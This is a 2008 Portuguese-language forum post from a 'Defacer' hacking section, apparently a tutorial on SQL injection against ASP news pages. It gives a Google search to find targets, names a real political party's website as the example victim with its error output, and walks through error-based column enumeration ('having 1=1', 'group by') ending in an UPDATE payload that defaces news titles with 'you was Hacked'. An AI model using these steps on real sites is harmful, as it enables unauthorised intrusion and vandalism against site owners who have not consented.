::||Forum Evolution||::
Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.


Sua Nova Evolução Pela Web!!!
 
InícioInício  PortalPortal  ProcurarProcurar  Últimas imagensÚltimas imagens  Registar  EntrarEntrar  

::||Forum Evolution||:: :: Area Hacker :: Defacer
 

 SQL avançado aprenda de vez

Ir para baixo 
AutorMensagem
jukilo
Ranking
Ranking
jukilo


Mensagens : 624
Data de inscrição : 01/03/2008

SQL avançado aprenda de vez Empty
MensagemAssunto: SQL avançado aprenda de vez   SQL avançado aprenda de vez Icon_minitimeSex Jul 04, 2008 3:01 pm
Primeiramente abra o

www.google.com.br

depois no campo de busca digite:

allinurl: noticias.asp?id=

ps: pra quem não sabe esse 'allinurl' serve para buscar na url dos sites 'noticias.asp?id='

escolha um dos sites que aparecer e entre.

por exemplo:
www.psdb.org.br/noticias.asp?id=25740
para saber se este site está vuneravel coloque uma aspa no final
se tiver vuneravel ele vai dar essa mensagem
assim:
www.psdb.org.br/noticias.asp?id=25740'
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.

/noticias.asp, line 152

E agora e que fazemos depois de ter visto esta mensagem
vamos colocar uma string na url para retornar msgs de erro do qual iremos descobrir os campos da tabela.

www.psdb.org.br/noticias.asp?id=25740having 1=1

resultado:


Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Noticias.Cod_Noticia' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/noticias.asp, line 152

descobrimos o primeiro campo do banco de dados do site

para descobrirmos outros campos da tabela. iremos trocar o comando having 1=1 por group by agora ficando

www.psdb.org.br/noticias.asp?id=25740gruop by Noticias.Cod_Noticia
descobrimos outro campo

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Noticias.Tit_Noticia' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/noticias.asp, line 152

voce pode ficar fazendo isto para pegar todos os campos da tabela, é so colocar a virgula entre os campos já encontrados,por exemplo:

www.psdb.org.br/noticias.asp?id=25740group by Noticias.Cod_Noticia, Noticias.Tit_Noticia

Para alterar o titulo e terminar o ataque é so fazer o seguinte:

http://www.psdb.org.br/noticias.asp?...oticias+set+Ti t_Noticia='you was Hacked'

Só atualizar

Se estiver algo errado porfavor me ''correge'' kkkkkk
se for criticar..façam criticas construtivas
Ir para o topo Ir para baixo
https://forumevolution.forumeiro.com
 
SQL avançado aprenda de vez
Ir para o topo 
Página 1 de 1
 Tópicos semelhantes
-
» Aprenda a Formatar seu Computador
» aprenda tira a senha da bius
» Aprenda a Retira a senha do administrador do Windows Disco de boot

Permissões neste sub-fórumNão podes responder a tópicos
::||Forum Evolution||:: :: Area Hacker :: Defacer-
Ir para: